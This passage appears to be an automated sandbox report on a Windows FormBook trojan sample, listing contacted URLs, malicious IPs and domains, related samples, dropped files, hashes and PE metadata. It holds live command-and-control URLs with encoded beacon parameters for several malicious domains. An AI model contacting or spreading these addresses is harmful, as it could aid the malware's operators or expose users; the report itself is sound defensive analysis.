                                    https://files.reg.ru/fonts/inter/Inter-Medium.woff2)icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://server194.hosting.reg.ru/managerhnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://2domains.ruicsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.ecosia.org/newtab/icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.reg.ru/support/#requesticsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                            high
                                            https://ac.ecosia.org/autocomplete?q=icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://files.reg.ru/fonts/inter/Inter-Regular.woff)icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://files.reg.ru/fonts/inter/Inter-Medium.woff)icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchicsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://files.reg.ru/fonts/inter/Inter-Regular.woff2)icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://funnystory.online/2dyu/?RhqLA=IdOhgVq&Zvupu44p=bADoicsunattend.exe, 00000006.00000002.3304456237.0000000004E94000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002AE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2843915674.0000000033CC4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  high
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://reg.ru?target=_blankicsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      13.248.169.48
                                                      www.aktmarket.xyzUnited States
                                                      16509AMAZON-02UStrue
                                                      31.31.196.177
                                                      www.nartex-uf.onlineRussian Federation
                                                      197695AS-REGRUtrue
                                                      172.104.82.74
                                                      funnystory.onlineUnited States
                                                      63949LINODE-APLinodeLLCUStrue
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1562311
                                                      Start date and time:2024-11-25 13:53:19 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 40s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:7
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Fi#U015f.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:Fi.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@8/3
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 53
                                                      • Number of non-executed functions: 298
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target hnmibsTvfR.exe, PID 4148 because it is empty
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: Fi#U015f.exe
                                                      TimeTypeDescription
                                                      07:55:37API Interceptor503521x Sleep call for process: icsunattend.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      13.248.169.48ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.tals.xyz/tj5o/
                                                      santi.exeGet hashmaliciousFormBookBrowse
                                                      • www.lirio.shop/qp0h/
                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                      • www.optimismbank.xyz/98j3/
                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                      • www.tals.xyz/cpgr/
                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                      • www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4
                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                      • www.tals.xyz/cpgr/
                                                      Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                      • www.tals.xyz/stx5/
                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                      • www.tals.xyz/k1td/
                                                      DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                      • www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • www.remedies.pro/hrap/
                                                      31.31.196.177ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.nartex-uf.online/sr6d/
                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                      • www.nartex-uf.online/9ul0/?9HaD=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeT5OVDDglLmzebYBZGko1gl0UlPxFA==&wdv4=1RD4
                                                      172.104.82.74VSP469620.exeGet hashmaliciousFormBookBrowse
                                                      • www.funnystory.online/2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD4
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      www.aktmarket.xyzVSP469620.exeGet hashmaliciousFormBookBrowse
                                                      • 13.248.169.48
                                                      www.nartex-uf.onlineZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 31.31.196.177
                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                      • 31.31.196.177
                                                      www.a1shop.shopVSP469620.exeGet hashmaliciousFormBookBrowse
                                                      • 13.248.169.48
                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                      • 13.248.169.48
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      AMAZON-02UShttps://docsend.com/view/ygpcsdciay42c22xGet hashmaliciousUnknownBrowse
                                                      • 108.158.75.127
                                                      Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                      • 63.32.197.17
                                                      https://www.e-serviceparts.info/landingpages/cce21bb4-48dd-49da-9e48-d89a21f56454/RtynoRElk6VQIiohoauuXaUdv9Gb4EPJBf3UQg9_Um4Get hashmaliciousHTMLPhisherBrowse
                                                      • 13.227.8.25
                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 13.248.169.48
                                                      http://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                      • 35.158.4.76
                                                      http://propdfhub.comGet hashmaliciousUnknownBrowse
                                                      • 54.230.112.122
                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 108.139.47.50
                                                      XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 13.228.81.39
                                                      05.Unzipped.obfhotel22-11.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                      • 185.166.143.48
                                                      LINODE-APLinodeLLCUShttp://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                      • 45.33.84.9
                                                      lCc7eClats.pdfGet hashmaliciousUnknownBrowse
                                                      • 139.162.100.28
                                                      7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                      • 172.105.70.228
                                                      fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                      • 23.92.26.108
                                                      fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                      • 172.104.13.240
                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                      • 172.104.82.74
                                                      wX7zgpJHJS.pdfGet hashmaliciousUnknownBrowse
                                                      • 139.162.100.28
                                                      SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                      • 192.81.132.76
                                                      https://app.typeset.com/play/G4WZ1Get hashmaliciousHTMLPhisherBrowse
                                                      • 45.33.60.162
                                                      https://www.plushtoysmfg.com/plush-keychain-factory/Get hashmaliciousAnonymous ProxyBrowse
                                                      • 45.33.3.184
                                                      AS-REGRUZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 31.31.196.177
                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                      • 194.58.112.174
                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                      • 31.31.196.177
                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                      • 194.58.112.174
                                                      Payroll List.exeGet hashmaliciousFormBookBrowse
                                                      • 31.31.196.17
                                                      HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                      • 31.31.198.145
                                                      Delivery_Notification_00000207899.doc.jsGet hashmaliciousUnknownBrowse
                                                      • 194.58.112.173
                                                      F8TXbAdG3G.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                      • 195.133.18.88
                                                      PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                      • 31.31.196.17
                                                      Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                      • 194.58.112.174
                                                      No context
                                                      No context
                                                      Process:C:\Windows\SysWOW64\icsunattend.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.121297215059106
                                                      Encrypted:false
                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Fi#U015f.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288768
                                                      Entropy (8bit):7.994951582829969
                                                      Encrypted:true
                                                      SSDEEP:6144:XCv6Z/Q+OdF67gIuOlFYxovbuNcCfa2BwjKnWQ4dT01vksv:NQd+7VHlFYxozccCJmjf0Zv
                                                      MD5:85C135D86D3829B874AE5D2CDE2FD369
                                                      SHA1:2D7361E0CE12DD4C125EF5F578A13C8271A13D53
                                                      SHA-256:555E5033F3367148DFFC6BC209A5384527C3A4D0B2ACB03CC9F81B9E2657EDF7
                                                      SHA-512:6B974D9274CF3FDE757A254A39B777D545F21D46AF042A5A8A85B7E37355D959108689DD38F6FCA1C2265208D8698FEFFC67564E07118C6D133A02A2402E3895
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.l.OSS5HU4LZ.NL.3KFB6SO.S5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KF.6SO^L.FQ.E...O.....+Es?"<R:0Yl9S> #-.)#bD&!p:[h.{.z_?*)w>FLf6SOPS5H(5E..0).dS,..V4.J...kT+.(..eS,.X...l3R..]/2.0).Y3KFB6SO..5H.5MZ]t..Y3KFB6SO.S7IZ5GZ2.JLY3KFB6SO.G5HQ$LZ2 JLY3.FB&SOPQ5HW4LZ2PNL_3KFB6SOP#1HQ6LZ2PNL[3..B6COPC5HQ4\Z2@NLY3KFR6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ.$+4-3KF.bWOPC5HQbHZ2@NLY3KFB6SOPS5Hq4L:2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KF
                                                      Process:C:\Users\user\Desktop\Fi#U015f.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288768
                                                      Entropy (8bit):7.994951582829969
                                                      Encrypted:true
                                                      SSDEEP:6144:XCv6Z/Q+OdF67gIuOlFYxovbuNcCfa2BwjKnWQ4dT01vksv:NQd+7VHlFYxozccCJmjf0Zv
                                                      MD5:85C135D86D3829B874AE5D2CDE2FD369
                                                      SHA1:2D7361E0CE12DD4C125EF5F578A13C8271A13D53
                                                      SHA-256:555E5033F3367148DFFC6BC209A5384527C3A4D0B2ACB03CC9F81B9E2657EDF7
                                                      SHA-512:6B974D9274CF3FDE757A254A39B777D545F21D46AF042A5A8A85B7E37355D959108689DD38F6FCA1C2265208D8698FEFFC67564E07118C6D133A02A2402E3895
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.l.OSS5HU4LZ.NL.3KFB6SO.S5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KF.6SO^L.FQ.E...O.....+Es?"<R:0Yl9S> #-.)#bD&!p:[h.{.z_?*)w>FLf6SOPS5H(5E..0).dS,..V4.J...kT+.(..eS,.X...l3R..]/2.0).Y3KFB6SO..5H.5MZ]t..Y3KFB6SO.S7IZ5GZ2.JLY3KFB6SO.G5HQ$LZ2 JLY3.FB&SOPQ5HW4LZ2PNL_3KFB6SOP#1HQ6LZ2PNL[3..B6COPC5HQ4\Z2@NLY3KFR6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ.$+4-3KF.bWOPC5HQbHZ2@NLY3KFB6SOPS5Hq4L:2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KFB6SOPS5HQ4LZ2PNLY3KF
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.140932670898213
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Fi#U015f.exe
                                                      File size:1'209'344 bytes
                                                      MD5:dd2d2996ee3044ca1ca5f90c91f2f77c
                                                      SHA1:7954d4424a2f3d17885ce18022446a10698f2dd7
                                                      SHA256:3897d9c3007e31624b405c791f4d45293aa60523c310069b06c0ec39b923f80e
                                                      SHA512:fc036e1541c04a5751f919c46d9db1efa547f30a7ec3eb08cc94f95bfd16cf7b43bba6b2f454d61a55eb1fa007aaf21fdaec67ad0daa749ea718c0f9130f9475
                                                      SSDEEP:24576:itb20pkaCqT5TBWgNQ7aBrlP0vnu23h+Obhgxbywk6A:vVg5tQ7aB5P0Nnb6w5
                                                      TLSH:F645DF2273DEC365C3725273BA25B701AE7F782506A1F96B2FD4093DF820162525EA73
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                      Icon Hash:aaf3e3e3938382a0
                                                      Entrypoint:0x425f74
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x673DC647 [Wed Nov 20 11:21:43 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                      Instruction
                                                      call 00007F6BBD20995Fh
                                                      jmp 00007F6BBD1FC974h
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007F6BBD1FCAFAh
                                                      cmp edi, eax
                                                      jc 00007F6BBD1FCE5Eh
                                                      bt dword ptr [004C0158h], 01h
                                                      jnc 00007F6BBD1FCAF9h
                                                      rep movsb
                                                      jmp 00007F6BBD1FCE0Ch
                                                      cmp ecx, 00000080h
                                                      jc 00007F6BBD1FCCC4h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007F6BBD1FCB00h
                                                      bt dword ptr [004BA370h], 01h
                                                      jc 00007F6BBD1FCFD0h
                                                      bt dword ptr [004C0158h], 00000000h
                                                      jnc 00007F6BBD1FCC9Dh
                                                      test edi, 00000003h
                                                      jne 00007F6BBD1FCCAEh
                                                      test esi, 00000003h
                                                      jne 00007F6BBD1FCC8Dh
                                                      bt edi, 02h
                                                      jnc 00007F6BBD1FCAFFh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007F6BBD1FCB03h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007F6BBD1FCB55h
                                                      bt esi, 03h
                                                      jnc 00007F6BBD1FCBA8h
                                                      movdqa xmm1, dqword ptr [esi+00h]
                                                      Programming Language:
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2012 UPD4 build 61030
                                                      • [RES] VS2012 UPD4 build 61030
                                                      • [LNK] VS2012 UPD4 build 61030
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5e3ac.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1230000x6c4c.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xc40000x5e3ac0x5e400b50b25a684a28293727dca157633d84dFalse0.9307728572612732data7.899490171213583IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1230000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                      RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                      RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                      RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                      RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                      RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                      RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                      RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                      RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                      RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                      RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                      RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
